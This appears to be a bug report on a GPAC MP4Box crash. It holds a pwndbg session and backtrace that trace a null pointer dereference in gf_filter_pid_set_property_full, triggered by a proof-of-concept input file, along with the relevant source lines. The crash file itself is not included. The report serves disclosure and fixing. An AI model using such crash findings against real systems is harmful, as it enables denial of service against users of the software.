    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     ► f 0   0x7ffff4b841c6 gf_filter_pid_set_property+182
       f 1   0x7ffff4b841c6 gf_filter_pid_set_property+182
       f 2   0x7ffff4c06993 gf_filter_pid_raw_new+595
       f 3   0x7ffff4dc30b1 filein_process+2721
       f 4   0x7ffff4c0eb6d gf_filter_process_task+3581
       f 5   0x7ffff4bd4953 gf_fs_thread_proc+2275
       f 6   0x7ffff4be0c67 gf_fs_run+455
       f 7   0x7ffff462a677 gf_media_import+10263
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301
    #1  gf_filter_pid_set_property (pid=pid@entry=0x613000000040, prop_4cc=prop_4cc@entry=1347244884, value=0x7ffffffe9150) at filter_core/filter_pid.c:5301
    #2  0x00007ffff4c06993 in gf_filter_pid_raw_new (filter=filter@entry=0x618000000c80, url=0x603000000f40 "../../../test/segv2/poc", local_file=<optimized out>, mime_type=<optimized out>, fext=<optimized out>, probe_data=<optimized out>, probe_size=<optimized out>, trust_mime=<optimized out>, out_pid=<optimized out>) at filter_core/filter.c:3891
    #3  0x00007ffff4dc30b1 in filein_process (filter=<optimized out>) at filters/in_file.c:481
    #4  0x00007ffff4c0eb6d in gf_filter_process_task (task=0x607000000b10) at filter_core/filter.c:2639
    #5  0x00007ffff4bd4953 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000110) at filter_core/filter_session.c:1857
    #6  0x00007ffff4be0c67 in gf_fs_run (fsess=fsess@entry=0x616000000080) at filter_core/filter_session.c:2118
    #7  0x00007ffff462a677 in gf_media_import (importer=importer@entry=0x7ffffffeaa50) at media_tools/media_import.c:1226
    #8  0x0000555555651a12 in convert_file_info (inName=<optimized out>, track_id=0x555555764fb0 <info_track_id>) at fileimport.c:130
    #9  0x000055555562279f in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6265
    #10 0x00007ffff1949083 in __libc_start_main (main=0x5555555f6a00 <main>, argc=3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478) at ../csu/libc-start.c:308
    #11 0x00005555555f6afe in _start () at mp4box.c:6811
    pwndbg> p pid
    $2 = (GF_FilterPid *) 0x613000000040
    pwndbg> c
    Continuing.
    [AVC|H264] Warning: Error parsing NAL unit
    
    Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9810, dyn_name=0x0, prop_name=0x0, prop_4cc=1146050121, pid=0x0) at filter_core/filter_pid.c:5301
    5301		return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ............
    until.......
    
    pwndbg> p pid
    $3 = (GF_FilterPid *) 0x0
    pwndbg> i b
    Num     Type           Disp Enb Address            What
    1       breakpoint     keep y   <MULTIPLE>         
    	breakpoint already hit 9 times
    1.1                         y   0x00007ffff4b829f6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.2                         y   0x00007ffff4b8314e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.3                         y   0x00007ffff4b834d1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.4                         y   0x00007ffff4b8393e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.5                         y   0x00007ffff4b83cc1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    1.6                         y   0x00007ffff4b841c6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250
    pwndbg> n
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    [Inferior 1 (process 2239158) exited with code 01]
    
    

**source code**

    5246 static GF_Err gf_filter_pid_set_property_full(GF_FilterPid *pid, u32 prop_4cc, const char *prop_name, char *dyn_name, const GF_PropertyValue *value, Bool is_info)
    5247 {
    5248 	GF_PropertyMap *map;
    5249 	const GF_PropertyValue *oldp;
    5250	if (PID_IS_INPUT(pid)) {    //**here**//
    5251		GF_LOG(GF_LOG_ERROR, GF_LOG_FILTER, ("Attempt to write property on input PID in filter %s - ignoring\n", pid->filter->name));
    5252		return GF_BAD_PARAM;
    5253	}

Tag

#php